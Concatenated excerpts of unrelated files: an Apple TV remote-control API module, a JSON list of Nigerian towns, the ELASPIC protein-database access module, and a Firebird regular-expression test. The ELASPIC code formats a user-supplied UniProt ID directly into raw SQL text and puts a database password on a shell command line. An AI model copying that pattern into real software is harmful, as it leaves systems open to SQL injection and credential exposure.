if index == -1:
# Here we have no leading . so return everything
return doc
# Try to find the first complete sentence and respect
# abbreviations correctly
match = re.findall(r"(.*\.[^A-Z]*)\.(?: [A-Z].*|)", doc)
if len(match) == 1:
return match[0]
return doc[0:index]
def retrieve_commands(obj: object):
"""Retrieve all commands and help texts from an API object."""
commands = {} # type: Dict[str, str]
for func in obj.__dict__:
if not inspect.isfunction(obj.__dict__[func]) and not isinstance(
obj.__dict__[func], property
):
continue
if func.startswith("_") or func == "listener":
continue
commands[func] = _get_first_sentence_in_pydoc(obj.__dict__[func])
return commands
class BaseService:
"""Base class for protocol services."""
def __init__(
self,
identifier: Optional[str],
protocol: Protocol,
port: int,
properties: Optional[Dict[str, str]],
) -> None:
"""Initialize a new BaseService."""
self.__identifier = identifier
self.protocol = protocol
self.port = port
self.credentials: Optional[str] = None
self.properties = properties or {}
@property
def identifier(self) -> Optional[str]:
"""Return unique identifier associated with this service."""
return self.__identifier
def merge(self, other) -> None:
"""Merge with other service of same type."""
self.credentials = other.credentials or self.credentials
self.properties.update(other.properties)
def __str__(self) -> str:
"""Return a string representation of this object."""
return "Protocol: {0}, Port: {1}, Credentials: {2}".format(
convert.protocol_str(self.protocol), self.port, self.credentials
)
class PairingHandler(ABC):
"""Base class for API used to pair with an Apple TV."""
def __init__(
self, session_manager: net.ClientSessionManager, service: BaseService
) -> None:
"""Initialize a new instance of PairingHandler."""
self.session_manager = session_manager
self._service = service
@property
def service(self) -> BaseService:
"""Return service used for pairing."""
return self._service
async def close(self) -> None:
"""Call to free allocated resources after pairing."""
await self.session_manager.close()
@abstractmethod
def pin(self, pin) -> None:
"""Pin code used for pairing."""
raise exceptions.NotSupportedError()
@property
@abstractmethod
def device_provides_pin(self) -> bool:
"""Return True if remote device presents PIN code, else False."""
raise exceptions.NotSupportedError()
@property
@abstractmethod
def has_paired(self) -> bool:
"""If a successful pairing has been performed.
The value will be reset when stop() is called.
"""
raise exceptions.NotSupportedError()
@abstractmethod
async def begin(self) -> None:
"""Start pairing process."""
raise exceptions.NotSupportedError()
@abstractmethod
async def finish(self) -> None:
"""Stop pairing process."""
raise exceptions.NotSupportedError()
class RemoteControl(ABC): # pylint: disable=too-many-public-methods
"""Base class for API used to control an Apple TV."""
# pylint: disable=invalid-name
@abstractmethod
@feature(0, "Up", "Up button on remote.")
async def up(self, action: InputAction = InputAction.SingleTap) -> None:
"""Press key up."""
raise exceptions.NotSupportedError()
@abstractmethod
@feature(1, "Down", "Down button on remote.")
async def down(self, action: InputAction = InputAction.SingleTap) -> None:
"""Press key down."""
raise exceptions.NotSupportedError()
@abstractmethod
@feature(2, "Left", "Left button on remote.")
async def left(self, action: InputAction = InputAction.SingleTap) -> None:
"""Press key left."""
raise exceptions.NotSupportedError()
@abstractmethod
@feature(3, "Right", "Right button on remote.")
async def right(self, action: InputAction = InputAction.SingleTap) -> None:
"""Press key right."""
raise exceptions.NotSupportedError()
@abstractmethod
@feature(4, "Play", "Start playing media.")
async def play(self) -> None:
"""Press key play."""
raise exceptions.NotSupportedError()
@abstractmethod
@feature(5, "PlayPause", "Toggle between play/pause.")
async def play_pause(self) -> None:
"""Toggle between play and pause."""
raise exceptions.NotSupportedError()
@abstractmethod
@feature(6, "Pause", "Pause playing media.")
async def pause(self) -> None:
"""Press key play."""
raise exceptions.NotSupportedError()
@abstractmethod
@feature(7, "Stop", "Stop playing media.")
async def stop(self) -> None:
"""Press key stop."""
raise exceptions.NotSupportedError()
@abstractmethod
@feature(8, "Next", "Change to next item.")
async def next(self) -> None:
"""Press key next."""
raise exceptions.NotSupportedError()
@abstractmethod
@feature(9, "Previous", "Change to previous item.")
async def previous(self) -> None:
"""Press key previous."""
raise exceptions.NotSupportedError()
@abstractmethod
@feature(10, "Select", "Select current option.")
async def select(self, action: InputAction = InputAction.SingleTap) -> None:
"""Press key select."""
raise exceptions.NotSupportedError()
@abstractmethod
@feature(11, "Menu", "Go back to previous menu.")
async def menu(self, action: InputAction = InputAction.SingleTap) -> None:
"""Press key menu."""
raise exceptions.NotSupportedError()
@abstractmethod
@feature(12, "VolumeUp", "Increase volume.")
async def volume_up(self) -> None:
"""Press key volume up."""
raise exceptions.NotSupportedError()
@abstractmethod
@feature(13, "VolumeDown", "Decrease volume.")
async def volume_down(self) -> None:
"""Press key volume down."""
raise exceptions.NotSupportedError()
@abstractmethod
@feature(14, "Home", "Home/TV button.")
async def home(self, action: InputAction = InputAction.SingleTap) -> None:
"""Press key home."""
raise exceptions.NotSupportedError()
@abstractmethod
@feature(
15, "HomeHold", "Long-press home button (deprecated: use RemoteControl.home)."
)
async def home_hold(self) -> None:
"""Hold key home."""
raise exceptions.NotSupportedError()
@abstractmethod
@feature(16, "TopMenu", "Go to main menu.")
async def top_menu(self) -> None:
"""Go to main menu (long press menu)."""
raise exceptions.NotSupportedError()
@abstractmethod
@feature(17, "Suspend", "Suspend device (deprecated; use Power.turn_off).")
async def suspend(self) -> None:
"""Suspend the device."""
raise exceptions.NotSupportedError()
@abstractmethod
@feature(18, "WakeUp", "Wake up device (deprecated; use Power.turn_on).")
async def wakeup(self) -> None:
"""Wake up the device."""
raise exceptions.NotSupportedError()
@abstractmethod
@feature(
36,
"SkipForward",
"Skip forward a time interval.",
)
async def skip_forward(self) -> None:
"""Skip forward a time interval.
Skip interval is typically 15-30s, but is decided by the app.
"""
raise exceptions.NotSupportedError()
@abstractmethod
@feature(37, "SkipBackward", "Skip backwards a time interval.")
async def skip_backward(self) -> None:
"""Skip backwards a time interval.
Skip interval is typically 15-30s, but is decided by the app.
"""
raise exceptions.NotSupportedError()
@abstractmethod
@feature(19, "SetPosition", "Seek to position.")
async def set_position(self, pos: int) -> None:
"""Seek in the current playing media."""
raise exceptions.NotSupportedError()
@abstractmethod
@feature(20, "SetShuffle", "Change shuffle state.")
async def set_shuffle(self, shuffle_state: const.ShuffleState) -> None:
"""Change shuffle mode to on or off."""
raise exceptions.NotSupportedError()
@abstractmethod
@feature(21, "SetRepeat", "Change repeat state.")
async def set_repeat(self, repeat_state: const.RepeatState) -> None:
"""Change repeat state."""
raise exceptions.NotSupportedError()
class Playing(ABC):
"""Base class for retrieving what is currently playing."""
def __str__(self) -> str:
"""Convert this playing object to a readable string."""
output = []
output.append(
" Media type: {0}".format(convert.media_type_str(self.media_type))
)
output.append(
"Device state: {0}".format(convert.device_state_str(self.device_state))
)
if self.title is not None:
output.append(" Title: {0}".format(self.title))
if self.artist is not None:
output.append(" Artist: {0}".format(self.artist))
if self.album is not None:
output.append(" Album: {0}".format(self.album))
if self.genre is not None:
output.append(" Genre: {0}".format(self.genre))
position = self.position
total_time = self.total_time
if position is not None and total_time is not None and total_time != 0:
output.append(
" Position: {0}/{1}s ({2:.1%})".format(
position, total_time, float(position) / float(total_time)
)
)
elif position is not None and position != 0:
output.append(" Position: {0}s".format(position))
elif total_time is not None and position != 0:
output.append(" Total time: {0}s".format(total_time))
if self.repeat is | |
"iso2": "NG",
"admin_name": "Edo",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Onueke",
"lat": "6.1554",
"lng": "8.0374",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Ebonyi",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Ile-Oluji",
"lat": "7.2131",
"lng": "4.8690",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Ondo",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Ughelli",
"lat": "5.4896",
"lng": "6.0041",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Delta",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Sabon Wuse",
"lat": "9.3342",
"lng": "7.2611",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Niger",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Tsanyawa",
"lat": "12.2956",
"lng": "7.9865",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Kano",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Warawa",
"lat": "11.8662",
"lng": "8.7015",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Kano",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Okopedi",
"lat": "4.8492",
"lng": "8.1256",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "<NAME>",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Ikot Ibritam",
"lat": "4.8117",
"lng": "7.6140",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "<NAME>",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Oghara",
"lat": "5.9355",
"lng": "5.6661",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Delta",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Oke-Agbe",
"lat": "7.6431",
"lng": "5.7594",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Ondo",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Bindawa",
"lat": "12.6699",
"lng": "7.8087",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Katsina",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Karaye",
"lat": "11.7836",
"lng": "8.0150",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Kano",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Rano",
"lat": "11.5568",
"lng": "8.5806",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Kano",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Bunkure",
"lat": "11.6992",
"lng": "8.5413",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Kano",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Kibiya",
"lat": "11.5280",
"lng": "8.6611",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Kano",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Afam",
"lat": "4.7900",
"lng": "7.3119",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Rivers",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Upenekang",
"lat": "4.5706",
"lng": "7.9795",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "<NAME>",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Isara",
"lat": "6.9890",
"lng": "3.6824",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Ogun",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Owa-Oyibu",
"lat": "6.1827",
"lng": "6.1990",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Delta",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Garko",
"lat": "11.6497",
"lng": "8.8033",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Kano",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Kwoi",
"lat": "9.4574",
"lng": "8.0068",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Kaduna",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Ezzamgbo",
"lat": "6.3989",
"lng": "7.9616",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Ebonyi",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Nkwoagu Isuochi",
"lat": "5.9912",
"lng": "7.3944",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Abia",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Ode-Ekiti",
"lat": "7.6481",
"lng": "5.5495",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Ekiti",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Hunkuyi",
"lat": "11.2668",
"lng": "7.6492",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Kaduna",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Isua",
"lat": "7.4536",
"lng": "5.9105",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Ondo",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Oleh",
"lat": "5.4619",
"lng": "6.2062",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Delta",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Okeho",
"lat": "8.0345",
"lng": "3.3476",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Oyo",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Ikot Nakanda",
"lat": "4.8843",
"lng": "8.4838",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "<NAME>",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Takai",
"lat": "11.5757",
"lng": "9.1088",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Kano",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Igede-Ekiti",
"lat": "7.6685",
"lng": "5.1263",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Ekiti",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Uromi",
"lat": "6.7097",
"lng": "6.3298",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Edo",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Ejigbo",
"lat": "7.9029",
"lng": "4.3142",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Osun",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Patani",
"lat": "5.2288",
"lng": "6.1914",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Delta",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Mbalano",
"lat": "5.7343",
"lng": "7.5024",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Abia",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Okehi",
"lat": "5.1390",
"lng": "7.1392",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Rivers",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Eberi",
"lat": "5.0912",
"lng": "7.2337",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Rivers",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Ise-Ekiti",
"lat": "7.4648",
"lng": "5.4233",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Ekiti",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Dandume",
"lat": "11.4588",
"lng": "7.1260",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Katsina",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Ijebu-Igbo",
"lat": "6.9720",
"lng": "3.9994",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Ogun",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Umuguma",
"lat": "5.4678",
"lng": "6.9659",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Imo",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Kiru",
"lat": "11.7021",
"lng": "8.1348",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "Kano",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Abuochiche",
"lat": "6.6913",
"lng": "8.9434",
"country": "Nigeria",
"iso2": "NG",
"admin_name": "<NAME>",
"capital": "minor",
"population": "",
"population_proper": ""
},
{
"city": "Oke-Ila",
"lat": "7.9493",
"lng": "4.9887",
"country": "Nigeria", | |
<filename>elaspic/elaspic_database.py
import datetime
import logging
import os
import os.path as op
import shlex
import shutil
import subprocess
from contextlib import contextmanager
import pandas as pd
import six
import sqlalchemy as sa
from elaspic import conf, errors, helper
from elaspic.elaspic_database_tables import (
Base,
UniprotDomain,
UniprotDomainModel,
UniprotDomainMutation,
UniprotDomainPair,
UniprotDomainPairModel,
UniprotDomainPairMutation,
)
from elaspic.kmtools_legacy import make_connection_string, parse_connection_string
logger = logging.getLogger(__name__)
def enable_sqlite_foreign_key_checks(engine):
from sqlalchemy import event
# Enable foreign key contraints
def _fk_pragma_on_connect(dbapi_con, con_record):
dbapi_con.execute("pragma foreign_keys=ON")
event.listen(engine, "connect", _fk_pragma_on_connect)
# Enable the write-ahead lock so that reads can occur simultaneously with writes
def _fk_pragma_on_connect(dbapi_con, con_record):
dbapi_con.execute("PRAGMA journal_mode=WAL")
event.listen(engine, "connect", _fk_pragma_on_connect)
# Set a longer timeout duration
def _fk_pragma_on_connect(dbapi_con, con_record):
dbapi_con.execute("pragma busy_timeout=60000") # 60 sec
event.listen(engine, "connect", _fk_pragma_on_connect)
# Get the session that will be used for all future queries.
# `expire_on_commit` so that you keep all the table objects even after the session closes.
Session = sa.orm.sessionmaker(expire_on_commit=False)
# Session = sa.orm.scoped_session(sa.orm.sessionmaker(expire_on_commit=False))
class MyDatabase(object):
""""""
def __init__(self, echo=False):
self.engine = self.get_engine(echo=echo)
self.configure_session()
logger.info(
"Using precalculated data from the following folder: '{archive_dir}'".format(
**conf.CONFIGS
)
)
def get_engine(self, echo=False):
"""Get an SQLAlchemy engine that can be used to connect to the database."""
sa_opts = {
"echo": echo,
}
if conf.CONFIGS["db_type"] == "sqlite":
sa_opts["isolation_level"] = "READ UNCOMMITTED"
elif conf.CONFIGS["db_type"] == "mysql":
sa_opts["isolation_level"] = "READ UNCOMMITTED"
sa_opts["pool_size"] = 1
sa_opts["pool_recycle"] = 3600
elif conf.CONFIGS["db_type"] == "postgresql":
sa_opts["pool_size"] = 1
sa_opts["pool_recycle"] = 3600
else:
raise Exception("Unsupported 'db_type': '{}'!".format(conf.CONFIGS["db_type"]))
engine = sa.create_engine(conf.CONFIGS["connection_string"], **sa_opts)
if conf.CONFIGS["db_type"] == "sqlite":
enable_sqlite_foreign_key_checks(engine)
logger.info("Opened database connection using engine: '{}'".format(engine))
return engine
def configure_session(self):
"""
Configure the Session class to use the current engine.
`autocommit` and `autoflush` are enabled for the `sqlite` database in order to improve
performance.
"""
global Session
if conf.CONFIGS["db_type"] == "sqlite":
autocommit = False # True
autoflush = True # True
# retry_on_failure = True
elif conf.CONFIGS["db_type"] in ["postgresql", "mysql"]:
autocommit = False
autoflush = True
# retry_on_failure = True
Session.configure(bind=self.engine, autocommit=autocommit, autoflush=autoflush)
@contextmanager
def session_scope(self):
"""Provide a transactional scope around a series of operations.
Enables the following construct: ``with self.session_scope() as session:``.
"""
session = Session()
try:
yield session
if not conf.CONFIGS["db_is_immutable"]:
session.commit()
except:
if not conf.CONFIGS["db_is_immutable"]:
session.rollback()
raise
finally:
session.expunge_all()
session.close()
def create_database_schema(self, db_schema):
"""Create ELASPIC database schema."""
# Create engine without a default schema
engine = sa.create_engine(
make_connection_string(
**{
**parse_connection_string(conf.CONFIGS["connection_string"]),
"db_schema": "",
}
)
)
sql_command = "CREATE SCHEMA IF NOT EXISTS `{}`;".format(db_schema)
logger.debug("sql_command: '{}'".format(sql_command))
engine.execute(sql_command)
def drop_database_schema(self, db_schema):
"""Drop ELASPIC database schema."""
# Create engine without a default schema
engine = sa.create_engine(
make_connection_string(
**{
**parse_connection_string(conf.CONFIGS["connection_string"]),
"db_schema": "",
}
)
)
sql_command = "DROP SCHEMA IF EXISTS {};".format(db_schema)
logger.debug("sql_command: '{}'".format(sql_command))
engine.execute(sql_command)
def create_database_tables(self, drop_schema=False):
"""Create a new database in the schema specified by the ``schema_version`` global variable.
If ``clear_schema == True``, remove all the tables in the schema first.
.. warning::
Using this function with an existing database can lead to loss of data.
Make sure that you know what you are doing!
Parameters
----------
clear_schema : bool
Whether or not to delete all tables in the database schema before creating new tables.
keep_uniprot_sequence : bool
Whether or not to keep the `uniprot_sequence` table.
Only relevant if `clear_schema` is `True`.
"""
if drop_schema and self.engine.name in ["mysql"]:
self.drop_database_schema(conf.CONFIGS["db_schema"])
self.create_database_schema(conf.CONFIGS["db_schema"])
# Create all tables, creating schema as neccessary
for table in Base.metadata.sorted_tables:
table.create(self.engine, checkfirst=True)
logger.debug("Database tables were created successfully.")
def delete_database_tables(self, drop_schema=False, drop_uniprot_sequence=False):
""".
Parameters
----------
drop_schema : bool
Whether or not to drop the schema after dropping the tables.
keep_uniprot_sequence : bool
Wheter or not to keep the table (and schema) containing uniprot sequences.
"""
if drop_schema and conf.CONFIGS["db_type"] == "sqlite":
os.remove(self.engine.url.database)
logger.info("Successfully removed database schema: {db_schema}".format(**conf.CONFIGS))
elif drop_schema and conf.CONFIGS["db_type"] == "mysql":
self.engine.execute("drop schema {db_schema};".format(**conf.CONFIGS))
logger.info("Successfully removed database schema: {db_schema}".format(**conf.CONFIGS))
else:
if drop_schema:
logger.info(
"Drop schema is not supported for %s database...",
conf.CONFIGS["db_type"],
)
# Remove tables one by one
for table in reversed(Base.metadata.sorted_tables):
if table.name != "uniprot_sequence" or drop_uniprot_sequence:
# conf.CONFIGS['table_name'] = table.name
# table.drop()
logger.debug("Dropping table %s...", table.name)
self.engine.execute("DROP TABLE IF EXISTS {};".format(table.name))
self.engine.execute("DROP TABLE IF EXISTS {};".format(table.name))
# %%
mysql_load_table_template = (
r"""mysql --local-infile --host={db_url} --user={db_username} --password={db_password} """
r"""{table_db_schema} -e "{sql_command}" """
)
psql_load_table_template = (
r"""PGPASSWORD={db_password} psql -h {db_url} -p {db_port} -U {db_username} """
r"""-d {db_database} -c "{sql_command}" """
)
# Need to double up on '\\'
mysql_command_template = (
r"""load data local infile '{table_folder}/{table_name}.tsv' """
r"""into table {table_db_schema}.{table_name} """
r"""fields terminated by '\t' escaped by '\\\\' lines terminated by '\n'; """
)
psql_command_template = (
r"""\\copy {table_db_schema}.{table_name} """
r"""from '{table_folder}/{table_name}.tsv' """
r"""with csv delimiter E'\t' null '\N' escape '\\'; """
)
sqlite_table_filename = "{table_folder}/{table_name}.tsv"
def _load_data_into_sqlite(self, configs):
table_df = pd.read_csv(
self.sqlite_table_filename.format(**configs),
sep="\t",
na_values="\\N",
# escapechar='\\', # escapes the `na_values` character and causes problems
names=Base.metadata.tables[configs["table_name"]].columns.keys(),
)
table_df.to_sql(configs["table_name"], self.engine, index=False, if_exists="append")
def _run_create_table_system_command(self, system_command):
if conf.CONFIGS["debug"]:
logger.debug(system_command)
subprocess.run(shlex.split(system_command), check=True)
def copy_table_to_db(self, table_name, table_folder):
"""Copy data from a ``.tsv`` file to a table in the database."""
cmd_options = conf.CONFIGS.copy()
cmd_options["table_name"] = table_name
cmd_options["table_folder"] = table_folder
def _format_configs():
cmd_options["table_db_schema"] = cmd_options["db_schema"]
logger.info("Copying '{table_name}' to '{db_type}' database...".format(**cmd_options))
if cmd_options["db_type"] == "sqlite":
self._load_data_into_sqlite(cmd_options)
elif cmd_options["db_type"] == "mysql":
_format_configs()
cmd_options["sql_command"] = self.mysql_command_template.format(**cmd_options)
system_command = self.mysql_load_table_template.format(**cmd_options)
self._run_create_table_system_command(system_command)
elif cmd_options["db_type"] == "postgresql":
_format_configs()
cmd_options["sql_command"] = self.psql_command_template.format(**cmd_options)
system_command = self.psql_load_table_template.format(**cmd_options)
self._run_create_table_system_command(system_command)
else:
raise Exception("Unsupported database type: '{}'".format(cmd_options["db_type"]))
@helper.retry_database
def get_rows_by_ids(self, row_object, row_object_identifiers, row_object_identifier_values):
"""Get the rows from the table `row_object` identified by keys `row_object_identifiers`."""
with self.session_scope() as session:
if len(row_object_identifiers) != len(row_object_identifier_values):
raise Exception(
"The number of identifiers and the number of identifier "
"values must be the same."
)
if len(row_object_identifiers) > 3:
raise Exception(
"Too many identifiers provied. The function is hard-coded "
"to handle at most three identifiers."
)
if len(row_object_identifiers) == 1:
row_instances = (
session.query(row_object)
.filter(row_object_identifiers[0] == row_object_identifier_values[0])
.all()
)
if len(row_object_identifiers) == 2:
row_instances = (
session.query(row_object)
.filter(row_object_identifiers[0] == row_object_identifier_values[0])
.filter(row_object_identifiers[1] == row_object_identifier_values[1])
.all()
)
if len(row_object_identifiers) == 3:
row_instances = (
session.query(row_object)
.filter(row_object_identifiers[0] == row_object_identifier_values[0])
.filter(row_object_identifiers[1] == row_object_identifier_values[1])
.filter(row_object_identifiers[2] == row_object_identifier_values[2])
.all()
)
return row_instances
@helper.retry_database
def get_uniprot_domain(self, uniprot_id, copy_data=False):
""""""
with self.session_scope() as session:
uniprot_domains = (
session.query(UniprotDomain)
.filter(UniprotDomain.uniprot_id == uniprot_id)
# .options(sa.orm.joinedload('template').joinedload('model'))
# .options(sa.orm.joinedload('template', innerjoin=True))
.limit(100)
.all()
)
archive_dir = conf.CONFIGS["archive_dir"]
archive_type = conf.CONFIGS["archive_type"]
d_idx = 0
while d_idx < len(uniprot_domains):
d = uniprot_domains[d_idx]
if not d.template:
logger.debug(
"Skipping uniprot domain with id {} because it does not "
"have a structural template...".format(d.uniprot_domain_id)
)
del uniprot_domains[d_idx]
continue
# Copy precalculated Provean data
if copy_data:
try:
self._copy_provean(d, archive_dir, archive_type)
except subprocess.CalledProcessError as e:
logger.error(e)
logger.error("Failed to copy provean supporting set!")
d.uniprot_sequence.provean.provean_supset_filename = ""
# Copy precalculated homology models
if copy_data:
try:
self._copy_uniprot_domain_data(d, d.path_to_data, archive_dir, archive_type)
except subprocess.CalledProcessError as e:
logger.error(e)
logger.error("Failed to copy the domain alignment and / or homology model!")
d.template.model.alignment_filename = None
d.template.model.model_filename = None
d_idx += 1
return uniprot_domains
@helper.retry_database
def get_uniprot_domain_pair(self, uniprot_id, copy_data=False, uniprot_domain_pair_ids=[]):
""""""
with self.session_scope() as session:
uniprot_domain_pairs_query = session.query(UniprotDomainPair).filter(
sa.or_(
sa.text("uniprot_id_1='{}'".format(uniprot_id)),
sa.text("uniprot_id_2='{}'".format(uniprot_id)),
)
)
if uniprot_domain_pair_ids:
uniprot_domain_pairs_query = uniprot_domain_pairs_query.filter(
UniprotDomainPair.uniprot_domain_pair_id.in_(uniprot_domain_pair_ids)
)
uniprot_domain_pairs = (
uniprot_domain_pairs_query
# .options(sa.orm.joinedload('template', innerjoin=True).joinedload('model'))
# .options(sa.orm.joinedload('template', innerjoin=True))
.limit(100).all()
)
# The above SQL query may result in duplicates if we have homodimers.
# So we need to remove possible dimers.
_seen = set()
uniprot_domain_pairs = [
d
for d in uniprot_domain_pairs
if d.uniprot_domain_pair_id not in _seen and not _seen.add(d.uniprot_domain_pair_id)
]
#
archive_dir = conf.CONFIGS["archive_dir"]
archive_type = conf.CONFIGS["archive_type"]
d_idx = 0
while d_idx < len(uniprot_domain_pairs):
d = uniprot_domain_pairs[d_idx]
if not d.template:
logger.debug(
"Skipping uniprot domain pair with id {} because it does not "
"have a structural template...".format(d.uniprot_domain_pair_id)
)
del uniprot_domain_pairs[d_idx]
continue
# Copy precalculated Provean data
if copy_data:
if d.uniprot_id_1 == uniprot_id:
ud = d.uniprot_domain_1
elif d.uniprot_id_2 == uniprot_id:
ud = d.uniprot_domain_2
try:
self._copy_provean(ud, archive_dir, archive_type)
except subprocess.CalledProcessError as e:
logger.error(e)
logger.error("Failed to copy provean supporting set!")
d.uniprot_sequence.provean.provean_supset_filename = ""
# Copy precalculated homology models
if copy_data:
try:
self._copy_uniprot_domain_pair_data(
d, d.path_to_data, archive_dir, archive_type
)
except subprocess.CalledProcessError as e:
logger.error(e)
logger.error("Failed to copy domain pair alignments and / or homology model!")
d.template.model.alignment_filename_1 = None
d.template.model.alignment_filename_2 = None
d.template.model.model_filename = None
d_idx += 1
return uniprot_domain_pairs
def _copy_uniprot_domain_data(self, d, path_to_data, archive_dir, archive_type):
if path_to_data is None:
logger.error("Cannot copy | |
<filename>tests/bugs/core_2006_test.py
#coding:utf-8
#
# id: bugs.core_2006
# title: SUBSTRING with regular expression (SIMILAR TO) capability
# decription:
# tracker_id: CORE-2006
# min_versions: ['3.0']
# versions: 3.0
# qmid: None
import pytest
from firebird.qa import db_factory, isql_act, Action
# version: 3.0
# resources: None
substitutions_1 = []
init_script_1 = """"""
db_1 = db_factory(sql_dialect=3, init=init_script_1)
test_script_1 = """
set list on;
------------------------------------------------------------------------------
-- Test for matching with percent characters before and after pattern:
select
trim(str) str
,trim(ptn) ptn
,iif( trim(str) similar to '%'||trim(ptn)||'%', 1, 0 ) "str similar to %ptn%"
,substring( trim(str) similar '%\\"' || trim(ptn) || '\\"%' escape '\\' ) "subs(str similar to %ptn%)"
from(
select
'WDWDWDWD' str
,'((DW)|(WD)){4}' ptn
from rdb$database
union all
select
'AAXYAAXYAAAAXYAAAXYAA' str
,'(AAXY|AAAX){2,}' ptn
from rdb$database
union all
select
'YZZXYZZ0Z0YZZYZZYYZZZYZZ0Z0YZZ'
,'(0Z0(Y|Z)*){2}'
from rdb$database
union all
select
'AARARARAARARAR'
,'RA(AR){3}'
from rdb$database
union all
select
'eiavieieav' str
,'(ie){2,}' ptn
from rdb$database
union all
select
'avieieavav' str
,'(av|ie){2,}' ptn
from rdb$database
union all
select
'avieieieav' str
,'((av)|(ie)){2,}' ptn
from rdb$database
);
----------------------
-- Test for exact matching to pattern:
select
trim(str) str
,trim(ptn) ptn
,iif( trim(str) similar to trim(ptn), 1, 0 ) "str similar to ptn"
,substring( trim(str) similar '\\"' || trim(ptn) || '\\"' escape '\\' ) "subs(str similar to ptn)"
from(
select ----------- core-2389
'x/t' str
,'%[/]t' ptn
from rdb$database
union all
select ------------------- core-2756
'2015-04-13' str
,'[[:DIGIT:]]{4}[-][[:DIGIT:]]{2}[-][[:DIGIT:]]{2}' ptn
from rdb$database
union all
select ------------------- core-2780
'WI-T3.0.0.31780 Firebird 3.0 Beta 2'
,'%[0-9]+.[0-9]+.[0-9]+((.?[0-9]+)*)[[:WHITESPACE:]]%'
from rdb$database
union all
select ----------- core-3523
'm'
,'[p-k]'
from rdb$database
union all
------------------- core-3754
select '1', '(1|2){0,}' from rdb$database union all select
'1', '(1|2){0,1}' from rdb$database union all select
'1', '(1|2){1}' from rdb$database union all select
'123', '(1|12[3]?){1}' from rdb$database union all select
